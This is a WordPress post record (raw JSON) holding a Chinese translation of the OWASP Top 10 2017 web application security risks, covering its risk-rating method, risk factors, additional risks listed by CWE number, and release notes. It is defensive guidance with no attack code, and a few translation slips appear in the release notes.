\u8981\u6c42\u63d0\u4f9b\u5b89\u5168\u7684\u53ef\u89c1\u5ea6\uff0c\u8ba9\u6240\u6709\u4e0d\u540c\u89d2\u8272\u7684\u4eba\u90fd\u53ef\u4ee5\u770b\u5230\u5e76\u7406\u89e3\u4f01\u4e1a\u7ec4\u7ec7\u7684\u5e94\u7528\u7a0b\u5e8f\u7684\u5b89\u5168\u6001\u52bf\u3002\u5b83\u8fd8\u8981\u6c42\u5c06\u91cd\u70b9\u96c6\u4e2d \u5728\u80fd\u4ee5\u6700\u4f4e\u6210\u672c\u6709\u6548\u51cf\u5c11\u98ce\u9669\u7684\u5b9e\u9645\u6d3b\u52a8\u548c\u6210\u679c\u4e0a\uff0c\u4ee5\u63d0\u9ad8\u6574\u4e2a\u4f01\u4e1a\u7ec4\u7ec7\u7684\u5b89\u5168\u6027\u3002\u4e00\u4e2a\u6709\u6548\u7684\u5e94\u7528\u7a0b\u5e8f\u5b89\u5168\u8ba1\u5212\u4e2d\u7684 \u4e00\u4e9b\u5173\u952e\u6d3b\u52a8\u5305\u62ec\uff1a<\/p>\n<p>+R<\/p>\n<p>\u5173\u4e8e\u98ce\u9669\u7684\u5907\u6ce8\u8bf4\u660e<\/p>\n<p>\u8fd9\u91cc\u8bb2\u8ff0\u7684\u662f\u98ce\u9669\uff0c\u800c\u4e0d\u662f\u6f0f\u6d1e<\/p>\n<p>\u867d\u71362007\u5e74\u548c\u4e4b\u524d\u66f4\u8001\u7248\u672c\u7684OWASP Top 10\u4e13\u6ce8\u4e8e\u67e5\u627e\u6700\u5e38\u89c1\u7684\u201c\u6f0f\u6d1e\u201d\uff0c\u4f46\u662fOWASP TOP 10\u4ecd\u7136\u4e00\u76f4\u56f4\u7ed5\u7740\u98ce\u9669\u800c \u7ec4\u7ec7\u3002\u8fd9\u4f7f\u5f97\u4e00\u4e9b\u8bd5\u56fe\u5bfb\u627e\u4e00\u4e2a\u4e25\u683c\u7684\u6f0f\u6d1e\u5206\u7c7b\u7ed3\u6784\u7684\u4eba\u4ea7\u751f\u4e86\u4e00\u4e9b\u7406\u89e3\u4e0a\u7684\u6df7\u4e71\u30022010\u5e74\u7684OWASP Top 10 \u9879\u76ee\u9996\u6b21\u660e \u786e\u4e8610\u5927\u98ce\u9669\uff0c\u5341\u5206\u660e\u786e\u5730\u63cf\u8ff0\u4e86\u5a01\u80c1\u4ee3\u7406\u3001\u653b\u51fb\u5411\u91cf\u3001\u6f0f\u6d1e\u3001\u6280\u672f\u98ce\u9669\uff0c\u548c\u4e1a\u52a1\u98ce\u9669\u8fd9\u4e9b\u56e0\u7d20\u5982\u4f55\u7ed3\u5408\u5728\u4e00\u8d77\u4ea7\u751f\u98ce \u9669\uff0c\u8fd9\u4e2a\u7248\u672c\u7684OWASP TOP 10\u4ecd\u7136\u91c7\u7528\u76f8\u540c\u7684\u65b9\u6cd5\u8bba\u3002<\/p>\n<p>Top 10 \u7684\u98ce\u9669\u8bc4\u7ea7\u65b9\u6cd5\u662f\u57fa\u4e8e\u300aOWASP\u98ce\u9669\u8bc4\u7ea7\u65b9\u6cd5\u300b\u3002\u5bf9\u4e8eTop 10\u4e2d\u6bcf\u4e00\u9879\uff0c\u6211\u4eec\u901a\u8fc7\u67e5\u770b\u6bcf\u4e2a\u5e38\u89c1\u6f0f\u6d1e\u4e00\u822c\u60c5 \u51b5\u4e0b\u7684\u53ef\u80fd\u6027\u56e0\u7d20\u548c\u5f71\u54cd\u56e0\u7d20\uff0c\u8bc4\u4f30\u4e86\u6bcf\u4e2a\u6f0f\u6d1e\u5bf9\u4e8e\u5178\u578b\u7684Web\u5e94\u7528\u7a0b\u5e8f\u9020\u6210\u7684\u5178\u578b\u98ce\u9669\uff0c\u7136\u540e\u6839\u636e\u6f0f\u6d1e\u7ed9\u5e94\u7528\u7a0b\u5e8f\u5e26 \u6765\u7684\u98ce\u9669\u7a0b\u5ea6\u7684\u4e0d\u540c\u6765\u5bf9Top 10\u8fdb\u884c\u5206\u7ea7\u3002\u968f\u7740\u4e8b\u4ef6\u7684\u53d8\u5316\uff0c\u8fd9\u4e9b\u56e0\u7d20\u5c06\u968f\u7740\u6bcf\u4e2a\u65b0\u7684\u5341\u5927\u7248\u672c\u7684\u66f4\u65b0\u3002<\/p>\n<p>\u300aOWASP\u98ce\u9669\u8bc4\u7ea7\u65b9\u6cd5\u300b\u5b9a\u4e49\u4e86\u8bb8\u591a\u7528\u4e8e\u8ba1\u7b97\u6f0f\u6d1e\u98ce\u9669\u7b49\u7ea7\u7684\u56e0\u7d20\u3002\u4f46\u662f\uff0cTop 10\u5e94\u8be5\u8ba8\u8bba\u666e\u904d\u6027\uff0c\u800c\u4e0d\u662f\u5728\u771f\u5b9e\u7684 \u5e94\u7528\u7a0b\u5e8f\u4e2d\u8ba8\u8bba\u5177\u4f53\u7684\u6f0f\u6d1e\u7684\u98ce\u9669\u3002\u56e0\u6b64\uff0c\u6211\u4eec\u65e0\u6cd5\u50cf\u7cfb\u7edf\u62e5\u6709\u8005\u90a3\u6837\u7cbe\u786e\u8ba1\u7b97\u5e94\u7528\u7a0b\u5e8f\u4e2d\u7684\u98ce\u9669\u9ad8\u4f4e\u3002\u6211\u4eec\u4e5f\u4e0d\u77e5\u9053 \u60a8\u7684\u5e94\u7528\u7a0b\u5e8f\u548c\u6570\u636e\u6709\u591a\u91cd\u8981\u3001\u60a8\u7684\u5a01\u80c1\u4ee3\u7406\u662f\u4ec0\u4e48\u3001\u6216\u662f\u60a8\u7684\u7cfb\u7edf\u662f\u5982\u4f55\u67b6\u6784\u548c\u5982\u4f55\u64cd\u4f5c\u7684\u3002<\/p>\n<p>\u5bf9\u4e8e\u6bcf\u4e00\u4e2a\u6f0f\u6d1e\uff0c\u6211\u4eec\u7684\u65b9\u6cd5\u5305\u542b\u4e09\u79cd\u53ef\u80fd\u6027\u56e0\u7d20\uff08\u666e\u904d\u6027\u3001\u53ef\u68c0\u6d4b\u6027\u548c\u53ef\u5229\u7528\u6027\uff09\u548c\u4e00\u4e2a\u5f71\u54cd\u56e0\u7d20\uff08\u6280\u672f\u5f71\u54cd\uff09\u3002 \u6f0f\u6d1e\u7684\u666e\u904d\u6027\u6211\u4eec\u901a\u5e38\u65e0\u9700\u8ba1\u7b97\u3002\u8bb8\u591a\u4e0d\u540c\u7684\u7ec4\u7ec7\u4e00\u76f4\u5728\u63d0\u4f9b\u666e\u904d\u6027\u7684\u6570\u636e\u7ed9\u6211\u4eec\uff08\u8bf7\u53c2\u8003\u7b2c3\u9875\u81f4\u8c22\u4e2d\u7684\u5185\u5bb9\uff09\u3002\u6211\u4eec \u53d6\u4e86\u8fd9\u4e9b\u6570\u636e\u7684\u5e73\u5747\u6570\u5f97\u5230\u4e86\u6839\u636e\u666e\u904d\u6027\u6392\u5e8f\u768410\u79cd\u6700\u53ef\u80fd\u5b58\u5728\u7684\u6f0f\u6d1e\u3002\u7136\u540e\u5c06\u8fd9\u4e9b\u6570\u636e\u548c\u5176\u4ed6\u4e24\u4e2a\u53ef\u80fd\u6027\u56e0\u7d20\u7ed3\u5408 \uff08\u53ef\u68c0\u6d4b\u6027\u548c\u53ef\u5229\u7528\u6027\uff09\uff0c\u7528\u4e8e\u8ba1\u7b97\u6bcf\u4e2a\u6f0f\u6d1e\u7684\u53ef\u80fd\u6027\u7b49\u7ea7\u3002\u7136\u540e\u7528\u6bcf\u4e2a\u6f0f\u6d1e\u7684\u53ef\u80fd\u6027\u7b49\u7ea7\u4e58\u4ee5\u6211\u4eec\u4f30\u8ba1\u7684\u6bcf\u4e2a\u6f0f\u6d1e\u7684 \u5e73\u5747\u6280\u672f\u5f71\u54cd\uff0c\u4ece\u800c\u5f97\u5230\u4e86Top 10\u5217\u8868\u4e2d\u6bcf\u4e00\u9879\u7684\u603b\u7684\u98ce\u9669\u7b49\u7ea7\u3002<\/p>\n<p>\u503c\u5f97\u6ce8\u610f\u7684\u662f\u8fd9\u4e2a\u65b9\u6cd5\u65e2\u6ca1\u6709\u8003\u8651\u5a01\u80c1\u4ee3\u7406\u7684\u53ef\u80fd\u6027\uff0c\u4e5f\u6ca1\u6709\u8003\u8651\u4efb\u4f55\u4e0e\u60a8\u7684\u7279\u5b9a\u5e94\u7528\u7a0b\u5e8f\u76f8\u5173\u7684\u6280\u672f\u7ec6\u8282\u3002\u8fd9\u4e9b\u56e0 \u7d20\u90fd\u53ef\u4ee5\u6781\u5927\u5f71\u54cd\u653b\u51fb\u8005\u53d1\u73b0\u548c\u5229\u7528\u67d0\u4e2a\u6f0f\u6d1e\u7684\u6574\u4e2a\u53ef\u80fd\u6027\u3002\u8fd9\u4e2a\u7b49\u7ea7\u540c\u6837\u6ca1\u6709\u5c06\u5bf9\u60a8\u7684\u4e1a\u52a1\u7684\u5b9e\u9645\u5f71\u54cd\u8003\u8651\u8fdb\u53bb\u3002\u60a8 \u7684\u4f01\u4e1a\u7ec4\u7ec7\u9700\u8981\u81ea\u5df1\u786e\u5b9a\u4f01\u4e1a\u7ec4\u7ec7\u53ef\u4ee5\u627f\u53d7\u7684\u5e94\u7528\u5b89\u5168\u98ce\u9669\u6709\u591a\u5927\u3002OWASP Top 10\u7684\u76ee\u7684\u5e76\u4e0d\u662f\u66ff\u60a8\u505a\u8fd9\u4e00\u98ce\u9669\u5206\u6790\u3002<\/p>\n<p>\u4e0b\u9762\u4e3e\u4f8b\u8bf4\u660eA3: \u8de8\u7ad9\u811a\u672c\u7684\u98ce\u9669\u8ba1\u7b97\u65b9\u6cd5\u3002\u6ce8\u610f\u5230XSS\u7684\u98ce\u9669\u975e\u5e38\u666e\u904d\uff0c\u4ee5\u81f4\u4e8e\u5b83\u88ab\u552f\u4e00\u8d4b\u4e88\u4e86\u201c\u975e\u5e38\u5e7f\u6cdb\u201d\u7684\u666e\u904d \u6027\u503c\u3002\u5176\u4ed6\u6240\u6709\u98ce\u9669\u503c\u7684\u8303\u56f4\u4ece\u5e7f\u6cdb\u5230\u5c11\u89c1\uff08\u503c\u4ece1\u52303\uff09\u3002<\/p>\n<p>+F<\/p>\n<p>\u5173\u4e8e\u98ce\u9669\u56e0\u7d20\u7684\u8be6\u7ec6\u8bf4\u660e<\/p>\n<p>Top 10\u98ce\u9669\u56e0\u7d20\u603b\u7ed3<\/p>\n<p>\u4e0b\u9762\u7684\u8868\u683c\u603b\u7ed3\u4e862013\u5e74\u7248Top 10\u5e94\u7528\u7a0b\u5e8f\u5b89\u5168\u98ce\u9669\u56e0\u7d20\uff0c\u4ee5\u53ca\u6211\u4eec\u8d4b\u4e88\u6bcf\u4e2a\u98ce\u9669\u56e0\u7d20\u7684\u98ce\u9669\u503c\u3002\u8fd9\u4e9b\u56e0\u7d20\u57fa\u4e8e OWASP\u56e2\u961f\u62e5\u6709\u7684\u7edf\u8ba1\u6570\u636e\u548c\u7ecf\u9a8c\u800c\u51b3\u5b9a\u3002\u4e3a\u4e86\u4e86\u89e3\u67d0\u4e2a\u7279\u5b9a\u7684\u5e94\u7528\u7a0b\u5e8f\u6216\u8005\u4f01\u4e1a\u7ec4\u7ec7\u7684\u98ce\u9669\uff0c\u60a8\u5fc5\u987b\u8003\u8651\u60a8\u81ea\u5df1\u7684\u5a01 \u80c1\u4ee3\u7406\u548c\u4e1a\u52a1\u5f71\u54cd\u3002\u5982\u679c\u6ca1\u6709\u76f8\u5e94\u4f4d\u7f6e\u4e0a\u7684\u5a01\u80c1\u4ee3\u7406\u53bb\u6267\u884c\u5fc5\u8981\u7684\u653b\u51fb\uff0c\u6216\u8005\u4ea7\u751f\u7684\u4e1a\u52a1\u5f71\u54cd\u5fae\u4e0d\u8db3\u9053\uff0c\u90a3\u4e48\u5c31\u662f\u518d\u81ed \u540d\u662d\u8457\u7684\u8f6f\u4ef6\u6f0f\u6d1e\u4e5f\u4e0d\u4f1a\u5bfc\u81f4\u4e00\u4e2a\u4e25\u91cd\u7684\u5b89\u5168\u98ce\u9669\u3002<\/p>\n<p>\u989d\u5916\u9700\u8981\u8003\u8651\u7684\u98ce\u9669<\/p>\n<p>\u867d\u7136Top 10\u7684\u5185\u5bb9\u8986\u76d6\u5e7f\u6cdb\uff0c\u4f46\u662f\u5728\u60a8\u7684\u4f01\u4e1a\u7ec4\u7ec7\u4e2d\u8fd8\u6709\u5176\u4ed6\u7684\u98ce\u9669\u9700\u8981\u60a8\u8003\u8651\u5e76\u4e14\u8bc4\u4f30\u3002\u6709\u7684\u98ce\u9669\u51fa\u73b0\u5728\u4e86OWASP Top 10\u7684\u4ee5 \u524d\u7248\u672c\u4e2d\uff0c\u800c\u6709\u7684\u5219\u6ca1\u6709\uff0c\u8fd9\u5305\u62ec\u5728\u4e0d\u505c\u88ab\u53d1\u73b0\u7684\u65b0\u7684\u653b\u51fb\u6280\u672f\u3002\u5176\u4ed6\u60a8\u9700\u8981\u8003\u8651\u7684\u91cd\u8981\u5e94\u7528\u7a0b\u5e8f\u5b89\u5168\u98ce\u9669\u5305\u62ec\u4ee5\u4e0b\u65b9\u9762\uff1a<\/p>\n<p>\u2022 \u70b9\u51fb\u52ab\u6301 (CAPEC-103) <\/p>\n<p>\u2022 \u62d2\u7edd\u670d\u52a1 (CWE-400) (Was 2004 Top 10 \u2013 Entry 2004-A9) <\/p>\n<p>\u2022 \u53cd\u5e8f\u5217\u5316(CWE-502) For defenses, see: OWASP Deserialization Cheat Sheet <\/p>\n<p>\u2022 \u8868\u8fbe\u5f0f\u8bed\u8a00\u6ce8\u5165 (CWE-917) <\/p>\n<p>\u2022 \u4fe1\u606f\u6cc4\u9732 (CWE-209) \u548c \u4e0d\u6070\u5f53\u7684\u9519\u8bef\u5904\u7406 (CWE-388) (Was part of 2007 Top 10 \u2013 Entry 2007-A6) <\/p>\n<p>\u2022 \u94fe\u63a5\u7b2c\u4e09\u65b9\u5185\u5bb9(CWE-829) <\/p>\n<p>\u2022 \u6076\u610f\u6587\u4ef6\u6267\u884c (CWE-434) (Was 2007 Top 10 \u2013 Entry 2007-A3) <\/p>\n<p>\u2022 \u8d28\u91cf\u5206\u914d (CWE-915) <\/p>\n<p>\u2022 \u670d\u52a1\u5668\u7aef\u8bf7\u6c42\u4f2a\u9020 (SSRF) (CWE-918) <\/p>\n<p>\u2022 \u672a\u9a8c\u8bc1\u7684\u8f6c\u53d1\u548c\u91cd\u5b9a\u5411(CWE-601) (Was 2013 Top 10 \u2013 Entry 2013-A10) <\/p>\n<p>\u2022 \u7528\u6237\u9690\u79c1(CWE-359)<\/p>\n","protected":false},"excerpt":{"rendered":"<p>http:\/\/m.sohu.com\/a\/139968130_669829\/?pvid=000115_3w_a \u6765\u81ea\uff1a\u6ef4\u6ef4\u5b89\u5168\u5e94\u6025\u54cd\u5e94\u4e2d\u5fc3\uff08\u5fae\u4fe1\u53f7\uff1adidisrc\uff09 \u6587\u7ae0\u7531\u6ef4\u6ef4\u5b89\u5168\u539f\u521b\uff0c\u8f6c\u8f7d\u8bf7\u6ce8\u660e\u51fa\u5904 OWASP(\u5f00\u653eWeb\u8f6f\u4f53\u5b89\u5168\u9879\u76ee- Open WebApplication Security Project)\u662f\u4e00\u4e2a\u5f00\u653e\u793e\u7fa4\u3001\u975e\u76c8\u5229\u6027\u7ec4\u7ec7\uff0c\u957f\u671f\u81f4\u529b\u4e8e\u534f\u52a9\u653f\u5e9c\u6216\u4f01\u4e1a\u4e86\u89e3\u5e76\u6539\u5584\u7f51\u9875\u5e94\u7528\u7a0b\u5f0f\u4e0e\u7f51\u9875\u670d\u52a1\u7684\u5b89\u5168\u6027\uff0c\u5177\u6709\u5f88\u5f3a\u7684\u6743\u5a01\u6027\u3002 I \u7b80\u4ecb \u6b22\u8fce \u6b22\u8fce\u9605\u8bfb2017\u5e74\u7248\u7684OWASP Top 10\uff01\u8fd9\u4e2a\u4e3b\u8981\u7684\u66f4\u65b0\u9996\u6b21\u589e\u52a0\u4e86\u4e24\u4e2a\u65b0\u7684\u6f0f\u6d1e\u7c7b\u522b\uff1a(1) \u653b\u51fb\u68c0\u6d4b\u4e0e\u9632\u8303\u4e0d\u8db3 (2) \u672a\u53d7\u4fdd\u62a4\u7684API\u3002\u6211\u4eec\u901a\u8fc7\u5c06\u4e24\u4e2a\u8bbf\u95ee\u63a7\u5236\u7c7b\u522b\uff082013-A4\u548c2013-A7\uff09\u5408\u5e76\u56de\u5230\u5931\u6548\u7684\u8bbf\u95ee\u63a7\u5236\uff08\u8fd9\u662f2014\u5e74\u7248Top 10\u7684\u5206\u7c7b\u540d\uff09\u4e2d\uff0c\u4e3a\u8fd9\u4e24\u4e2a\u65b0\u7c7b\u522b\u817e\u51fa\u7a7a\u95f4\uff0c\u5e76\u5c062013-A10 \u201c\u672a\u7ecf\u9a8c\u8bc1\u7684\u91cd\u5b9a\u5411\u548c\u8f6c\u53d1\u201d\u53bb\u6389\u3002 2017\u5e74\u7248\u7684OWASP Top 10\u6587\u6863\u57fa\u4e8e\u6765\u81ea\u4e13\u4e1a\u7684\u5e94\u7528\u5b89\u5168\u516c\u53f8\u768411\u4e2a\u5927\u578b\u6570\u636e\u5e93\uff0c\u5176\u4e2d\u5305\u62ec\uff1a8\u5bb6\u54a8\u8be2\u516c\u53f8\uff0c3\u5bb6\u4ea7\u54c1\u63d0\u4f9b\u5546\u3002\u6570\u636e\u6db5\u76d6\u4e86\u6765\u81ea\u4e0a\u767e\u5bb6\u7ec4\u7ec7\u4e0a\u5343\u4e2a\u5e94 \u7528\uff0c\u8d85\u8fc750,000\u4e2a\u771f\u5b9e\u73af\u5883\u4e2d\u7684\u6f0f\u6d1e\u548cAPIs\u3002Top 10\u6839\u636e\u6240\u6709\u8fd9\u4e9b\u76f8\u5173\u6570\u636e\u6311\u9009\u548c\u6392\u5e8f\uff0c\u5e76\u4e0e\u53ef\u5229\u7528\u6027\u3001\u53ef\u68c0\u6d4b\u6027\u548c\u5f71\u54cd\u7a0b\u5ea6\u7684\u4e00\u81f4\u8bc4\u4f30\u76f8\u7ed3\u5408\u3002 OWASP Top 10\u7684\u4e3b\u8981\u76ee\u7684\u662f\u6559\u80b2\u5f00\u53d1\u4eba\u5458\uff0c\u8bbe\u8ba1\u5e08\uff0c\u67b6\u6784\u5e08\uff0c\u7ecf\u7406\u548c\u7ec4\u7ec7\uff0c\u4e86\u89e3\u6700\u91cd\u8981\u7684Web\u5e94\u7528\u7a0b\u5e8f\u5b89\u5168\u6f0f\u6d1e\u7684\u540e\u679c\u3002Top 10\u63d0\u4f9b\u4e86\u9632\u8303\u8fd9\u4e9b\u9ad8\u98ce\u9669\u95ee\u9898\u9886\u57df\u7684\u57fa\u672c\u6280\u672f\uff0c\u5e76\u4e3a\u60a8\u63d0\u4f9b\u4e86\u4ece\u8fd9\u91cc\u8d70\u5230\u54ea\u91cc\u7684\u6307\u5bfc\u3002 \u8b66\u544a \u4e0d\u8981\u4ec5\u5173\u6ce8OWASP Top 10\uff1a\u6b63\u5982\u5728\u300aOWASP\u5f00\u53d1\u8005\u6307\u5357\u300b\u548c\u300aOWASP Cheat Sheet\u300b\u4e2d\u6240\u8ba8\u8bba\u7684\uff0c\u80fd\u5f71\u54cd\u6574\u4e2aweb\u5e94\u7528\u7a0b\u5e8f\u5b89\u5168\u7684\u6f0f\u6d1e\u6210\u767e\u4e0a\u5343\u3002\u8fd9\u4e9b\u6307\u5357\u662f\u5f53\u4ecaweb\u5e94\u7528\u7a0b\u5e8f\u5f00\u53d1\u4eba\u5458\u7684\u5fc5\u8bfb\u8d44\u6599\u3002\u800c\u300aOWASP\u6d4b\u8bd5\u6307\u5357\u300b\u548c\u300aOWASP\u4ee3\u7801\u5ba1\u67e5\u6307\u5357\u300b\u5219\u6307\u5bfc\u4eba\u4eec\u5982\u4f55\u6709\u6548\u5730\u67e5\u627eweb \u5e94\u7528\u7a0b\u5e8f\u4e2d\u7684\u6f0f\u6d1e\u3002\u8fd9\u4e24\u672c\u6307\u5357\u5728\u53d1\u5e03OWASP Top 10\u7684\u524d\u7248\u672c\u65f6\u5c31\u5df2\u7ecf\u8fdb\u884c\u4e86\u660e\u663e\u66f4\u65b0\u3002 \u4e0d\u65ad\u4fee\u6539\uff1a\u6b64Top 10\u5c06\u4e0d\u65ad\u66f4\u65b0\u3002\u5373\u4f7f\u60a8\u4e0d\u6539\u53d8\u5e94\u7528\u7a0b\u5e8f\u7684\u4efb\u4f55\u4e00\u884c\u4ee3\u7801\uff0c\u60a8\u7684\u5e94\u7528\u7a0b\u5e8f\u53ef\u80fd\u5df2\u7ecf\u5b58\u5728\u4ece\u6765\u6ca1\u6709\u88ab\u4eba\u53d1\u73b0\u8fc7\u7684\u6f0f\u6d1e\u3002\u8981\u4e86\u89e3\u66f4\u591a\u4fe1\u606f\uff0c\u8bf7\u67e5\u770bTop 10\u7ed3\u5c3e\u7684\u5efa\u8bae\u90e8\u5206\uff0c\u201c\u5f00\u53d1\u4eba\u5458\u3001\u6d4b\u8bd5\u4eba\u5458\u548c\u4f01\u4e1a\u7ec4\u7ec7\u4e0b\u4e00\u6b65\u505a\u4ec0\u4e48\u201d\u3002 \u6b63\u9762\u601d\u8003\uff1a\u5f53\u60a8\u5df2\u7ecf\u505a\u597d\u51c6\u5907\u505c\u6b62\u67e5\u627e\u6f0f\u6d1e\u5e76\u96c6\u4e2d \u7cbe\u529b\u5efa\u7acb\u5f3a\u5927\u7684\u5e94\u7528\u7a0b\u5e8f\u5b89\u5168\u63a7\u5236\u65f6\uff0cOWASP\u5df2\u7ecf\u5236\u4f5c\u4e86\u300a\u5e94\u7528\u7a0b\u5e8f\u5b89\u5168\u9a8c\u8bc1\u6807\u51c6\uff08ASVS\uff09\u300b\u6307\u5bfc\u4f01\u4e1a\u7ec4\u7ec7\u548c\u5e94\u7528\u7a0b\u5e8f\u5ba1\u67e5\u8005\u5982\u4f55\u53bb\u8fdb\u884c\u9a8c\u8bc1\u3002 \u660e\u667a\u4f7f\u7528\u5de5\u5177\uff1a\u5b89\u5168\u6f0f\u6d1e\u53ef\u80fd\u5f88\u590d\u6742\u5e76\u4e14\u85cf\u533f\u5728\u4ee3\u7801\u884c\u7684\u6df1\u5904\u3002\u67e5\u627e\u5e76\u6d88\u9664\u8fd9\u4e9b\u6f0f\u6d1e\u7684\u6700\u6839\u672c\u6709\u6548\u7684\u65b9\u6cd5\u5c31\u662f\u5229\u7528\u4e13\u5bb6\u7684\u7ecf\u9a8c\u4ee5\u53ca\u597d\u7684\u5de5\u5177\u3002 \u5176\u4ed6\uff1a\u5728\u60a8\u7684\u7ec4\u7ec7\u4e2d\uff0c\u91cd\u70b9\u5173\u6ce8\u8ba9\u5b89\u5168\u6210\u4e3a\u7ec4\u7ec7\u6587\u5316\u7684\u4e00\u90e8\u5206\u3002\u66f4\u591a\u4fe1\u606f\uff0c\u8bf7\u53c2\u89c1\u300a\u5f00\u653e\u8f6f\u4ef6\u4fdd\u8bc1\u6210\u719f\u5ea6\u6a21\u578b\uff08SAMM\uff09\u300b\u548c\u300aRugged Handbook\u300b\u3002 RN \u53d1\u884c\u8bf4\u660e \u4ece2013\u7248\u52302017\u7248\u6709\u4ec0\u4e48\u6539\u53d8\uff1f \u5e94\u7528\u7a0b\u5e8f\u5b89\u5168\u7684\u5a01\u80c1\u60c5\u51b5\u4e0d\u65ad\u6539\u53d8\u3002\u8fd9\u79cd\u6f14\u53d8\u7684\u5173\u952e\u56e0\u7d20\u662f\u8fc5\u901f\u91c7\u7528\u65b0\u6280\u672f\uff08\u5305\u62ec\u4e91\u8ba1\u7b97\uff0c\u5bb9\u5668\u548cAPIs\uff09\uff0c\u8f6f\u4ef6\u5f00\u53d1\u8fc7\u7a0b\uff08\u5982\u654f\u6377\u5f00\u53d1\u548cDevOps\uff09\u7684\u52a0\u901f\u548c\u81ea\u52a8\u5316\uff0c\u7b2c\u4e09\u65b9\u5e93\u548c\u6846\u67b6\u7684\u7206\u70b8\u5f0f\u589e\u957f\u4ee5\u53ca\u653b\u51fb\u8005\u7684\u8fdb\u6b65\u3002\u8fd9\u4e9b\u56e0\u7d20\u5f80\u5f80\u4f7f\u5e94\u7528\u7a0b\u5e8f\u548cAPIs\u66f4\u96be\u5206\u6790\uff0c\u5e76\u53ef\u4ee5\u663e\u8457\u6539\u53d8\u5a01\u80c1\u5f62\u6001\u3002\u4e3a\u8ddf\u4e0a\u53d1\u5c55\uff0c\u6211\u4eec\u5468\u671f\u6027\u7684\u66f4\u65b0OWASP Top 10\u3002\u5728\u672c\u6b212017\u5e74\u7248\u672c\u4e2d\uff0c\u6211\u4eec\u505a\u4e86\u4ee5\u4e0b\u6539\u53d8\uff1a 1) \u6211\u4eec\u5408\u5e76\u4e862013-A4\u201c\u4e0d\u5b89\u5168\u7684\u76f4\u63a5\u5bf9\u8c61\u5f15\u7528\u201d\u548c2013-A7\u201c\u529f\u80fd\u7ea7\u8bbf\u95ee\u63a7\u5236\u529f\u80fd\u7f3a\u5931\u201d\u52302017-A4\u201c\u65e0\u6548\u7684\u8bbf\u95ee\u63a7\u5236\u201d\u3002 o 2007\u5e74\uff0c\u6211\u4eec\u5c06\u5931\u6548\u7684\u8bbf\u95ee\u63a7\u5236\u5206\u4e3a\u4e24\u7c7b\uff0c\u4ee5\u4fbf\u66f4\u591a\u5730\u5173\u6ce8\u8bbf\u95ee\u63a7\u5236\u95ee\u9898\uff08\u6570\u636e\u548c\u529f\u80fd\uff09\u7684\u6bcf\u4e00\u65b9\u9762\u3002\u6211\u4eec\u4e0d\u518d\u89c9\u5f97\u8fd9\u662f\u5fc5\u8981\u7684\uff0c\u6240\u4ee5\u6211\u4eec\u5c06\u5b83 \u4eec\u5408\u5e76\u5728\u4e00\u8d77\u3002 2) \u6211\u4eec\u589e\u52a0\u4e862017-A7\uff1a\u653b\u51fb\u68c0\u6d4b\u4e0e\u9632\u8303\u4e0d\u8db3 \u591a\u5e74\u6765\uff0c\u6211\u4eec\u8003\u8651\u589e\u52a0\u5bf9\u81ea\u52a8\u653b\u51fb\u7684\u9632\u5fa1\u529b\u4e0d\u8db3\u3002\u57fa\u4e8e\u6570\u636e\u8c03\u7528\uff0c\u6211\u4eec\u770b\u5230\u5927\u591a\u6570\u5e94\u7528\u7a0b\u5e8f\u548cAPI\u7f3a\u4e4f\u68c0\u6d4b\u4e0e\u9632\u8303\u548c\u54cd\u5e94\u624b\u52a8\u6216\u8005\u81ea\u52a8\u5316\u653b\u51fb\u7684\u57fa\u672c\u529f\u80fd\u5e94\u7528\u7a0b\u5e8f\u548cAPIs\u6240\u6709\u8005\u8fd8\u9700\u8981\u80fd\u591f\u5feb\u901f\u90e8\u7f72\u8865\u4e01\u4ee5\u4fdd\u62a4\u548c\u9632\u6b62\u653b\u51fb\u3002 3) \u6211\u4eec\u589e\u52a0\u4e862017-A10: \u672a\u53d7\u4fdd\u62a4\u7684API \u73b0\u4ee3\u5e94\u7528\u7a0b\u5e8f\u548cAPI\u901a\u5e38\u6d89\u53ca\u4e30\u5bcc\u7684\u5ba2\u6237\u7aef\u5e94\u7528\u7a0b\u5e8f\uff0c\u4f8b\u5982\u6d4f\u89c8\u5668\u4e2d\u7684Java\u548c\u79fb\u52a8\u7aef\u5e94\u7528\u7a0b\u5e8f\uff0c\u8fde\u63a5\u5230\u67d0\u79cdAPI\uff08SOAP \/ XML\uff0cREST \/JSON\uff0cRPC\uff0cGWT\u7b49\uff09\u3002\u8fd9\u4e9bAPI\u901a\u5e38\u662f\u4e0d\u53d7\u4fdd\u62a4\u7684\uff0c\u5e76\u4e14\u5305\u542b\u8bb8\u591a\u6f0f\u6d1e\u3002\u6211\u4eec\u5c06\u5176\u5305\u62ec\u5728\u8fd9\u91cc\uff0c\u4ee5\u5e2e\u52a9\u7ec4\u7ec7\u4e13\u6ce8\u4e8e\u8fd9\u4e00\u4e3b\u8981\u7684\u65b0\u5174\u98ce\u9669\u3002 4) \u6211\u4eec\u53bb\u6389\u4e862013-A10:\u672a\u9a8c\u8bc1\u7684\u91cd\u5b9a\u5411\u548c\u8f6c\u53d1 \u2013 2010\u5e74\uff0c\u6211\u4eec\u589e\u52a0\u4e86\u8fd9\u4e00\u7c7b\u522b\uff0c\u4ee5\u63d0\u9ad8\u5bf9\u8fd9\u4e2a\u95ee\u9898\u7684\u8ba4\u8bc6\u3002\u7136\u800c\uff0c\u6570\u636e\u663e\u793a\uff0c\u8fd9\u4e2a\u95ee\u9898\u5e76\u4e0d\u50cf\u9884\u671f\u90a3\u4e48\u666e\u904d\u3002\u6240\u4ee5\u5728\u8fdb\u5165top 10\u7684\u6700\u540e\u4e24\u4e2a\u7248\u672c\u4e4b\u540e\uff0c\u8fd9\u4e00\u6b21\u5e76\u6ca1\u6709\u524a\u51cf\u3002 \u6ce8\u610f\uff1aT10\u56f4\u7ed5\u4e3b\u8981\u98ce\u9669\u533a\u57df\u8fdb\u884c\u6574\u7406\uff0c\u800c\u4e0d\u662f\u5bc6\u5c01\uff0c\u4e0d\u91cd\u53e0\u6216\u4e25\u683c\u7684\u5206\u7c7b\u3002\u5176\u4e2d\u4e00\u4e9b\u662f\u56f4\u7ed5\u7740\u653b\u51fb\u8005\u6574\u7406\u7684\uff0c\u4e00\u4e9b\u662f\u8106\u5f31\u6027&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_eb_attr":"","footnotes":""},"categories":[95,80],"tags":[],"class_list":["post-1681","post","type-post","status-publish","format-standard","hentry","category-95","category-80"],"_links":{"self":[{"href":"https:\/\/oneai.eu.org\/index.php?rest_route=\/wp\/v2\/posts\/1681","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/oneai.eu.org\/index.php?rest_route=\/wp\